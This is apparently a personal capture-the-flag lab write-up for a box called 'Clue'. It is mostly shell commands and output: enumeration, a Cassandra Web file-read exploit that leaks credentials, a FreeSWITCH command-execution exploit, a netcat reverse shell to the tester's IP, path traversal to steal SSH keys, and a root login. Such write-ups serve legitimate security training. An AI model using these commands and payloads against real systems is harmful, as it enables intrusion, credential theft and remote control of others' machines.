$ sudo nmap -sCV -p- -v -Pn --open 192.168.243.240 > Clue.txt
PORT     STATE SERVICE          VERSION
22/tcp   open  ssh              OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 74:ba:20:23:89:92:62:02:9f:e7:3d:3b:83:d4:d9:6c (RSA)
|   256 54:8f:79:55:5a:b0:3a:69:5a:d5:72:39:64:fd:07:4e (ECDSA)
|_  256 7f:5d:10:27:62:ba:75:e9:bc:c8:4f:e2:72:87:d4:e2 (ED25519)
80/tcp   open  http             Apache httpd 2.4.38
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.38 (Debian)
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
139/tcp  open  netbios-ssn      Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn      Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3000/tcp open  http             Thin httpd
|_http-server-header: thin
|_http-title: Cassandra Web
|_http-favicon: Unknown favicon MD5: 68089FD7828CD453456756FE6E7C4FD8
| http-methods: 
|_  Supported Methods: GET HEAD
8021/tcp open  freeswitch-event FreeSWITCH mod_event_socket
Service Info: Hosts: 127.0.0.1, CLUE; OS: Linux; CPE: cpe:/o:linux:linux_kernel


FreeSWITCH

$ enum4linux -a 192.168.243.240
//192.168.243.240/backup        Mapping: OK Listing: OK Writing: N/A
cassie
anthony

$ smbclient //192.168.243.240/backup -N
prompt off 
recurse on
mget *

$ grep -ri "password"
./etc/freeswitch/autoload_configs/event_socket.conf.xml:
<param name="password" value="ClueCon"/> # Found default password for freeswitch

$ searchsploit freeswitch # Get python script here
FreeSWITCH 1.10.1 - Command Execution               | windows/remote/47799.txt

$ searchsploit cassandra
Cassandra Web 0.5.0 - Remote File Read              | linux/webapps/49362.py
$ python3 49362.py 192.168.243.240 '/etc/passwd'
root:x:0:0:root:/root:/bin/bash
cassie:x:1000:1000::/home/cassie:/bin/bash
anthony:x:1001:1001::/home/anthony:/bin/bash

$ python3 49362.py 192.168.243.240 /proc/self/cmdline
/usr/bin/ruby2.5/usr/local/bin/cassandra-web-ucassie-pSecondBiteTheApple330

cassie:SecondBiteTheApple330

$ python3 49362.py 192.168.243.240 '/etc/freeswitch/autoload_configs/event_socket.conf.xml'
<param name="password" value="StrongClueConEight021"/>

# In python script from 47799.txt, change password from default to StrongClueConEight021
$ python3 exploit.py 192.168.243.240 id
Authenticated
Content-Type: api/response
Content-Length: 63

uid=998(freeswitch) gid=998(freeswitch) groups=998(freeswitch)
# Try 4444,443 fail, use port 8021 
$ python3 exploit.py 192.168.243.240 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.178 8021 >/tmp/f'
Authenticated

$ rlwrap nc -nlvp 8021
listening on [any] 8021 ...
connect to [192.168.45.178] from (UNKNOWN) [192.168.243.240] 38422
bash: cannot set terminal process group (544): Inappropriate ioctl for device
bash: no job control in this shell
freeswitch@clue:/$ id
id
uid=998(freeswitch) gid=998(freeswitch) groups=998(freeswitch)

Linux clue 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64 GNU/Linux

$ python3 49362.py 192.168.243.240 '/home/cassie/id_rsa'

cd /var/lib/freeswitch # Found local.txt

freeswitch@clue:/$ su cassie
su cassie
Password: SecondBiteTheApple330
id
uid=1000(cassie) gid=1000(cassie) groups=1000(cassie)
cassie@clue:/$ sudo -l
(ALL) NOPASSWD: /usr/local/bin/cassandra-web

cassie@clue:/home$ sudo /usr/local/bin/cassandra-web -h
sudo /usr/local/bin/cassandra-web -h
Usage: cassandra-web [options]
    -B, --bind BIND                  ip:port or path for cassandra web to bind on (default: 0.0.0.0:3000)
    -H, --hosts HOSTS                coma-separated list of cassandra hosts (default: 127.0.0.1)
    -P, --port PORT                  integer port that cassandra is running on (default: 9042)
    -L, --log-level LEVEL            log level (default: info)
    -u, --username USER              username to use when connecting to cassandra
    -p, --password PASS              password to use when connecting to cassandra
    -C, --compression NAME           compression algorithm to use (lz4 or snappy)
        --server-cert PATH           server ceritificate pathname
        --client-cert PATH           client ceritificate pathname
        --private-key PATH           path to private key
        --passphrase SECRET          passphrase for the private key
    -h, --help                       Show help

cassie@clue:/home$ sudo /usr/local/bin/cassandra-web -B 0.0.0.0:4444 -u cassie -p SecondBiteTheApple330

cassie@clue:/$ curl --path-as-is http://0.0.0.0:4444/../../../../../../../../../../home/anthony/.ssh/id_rsa
# copy the id_rsa to Kali, chmod 600 it, fail for login in as anthony, but somehow work with root.
$ ssh -i anthony_id_rsa anthony@192.168.161.240
$ ssh -i anthony_id_rsa root@192.168.161.240
root@clue:~# id
uid=0(root) gid=0(root) groups=0(root)

#####################################################################################
Key learning:
1. Need to read exploit code more, to understand how it works. Sometime it could be just request with LFI like ../../../../../../../<target_file>, and its same as curl the web from internal.
2. Try something randomly, like user_id_rsa to root, like this case, it works.
3. when you find some interesting files from backup folder, can try to follow the path to read the original files, it shows different in this case.

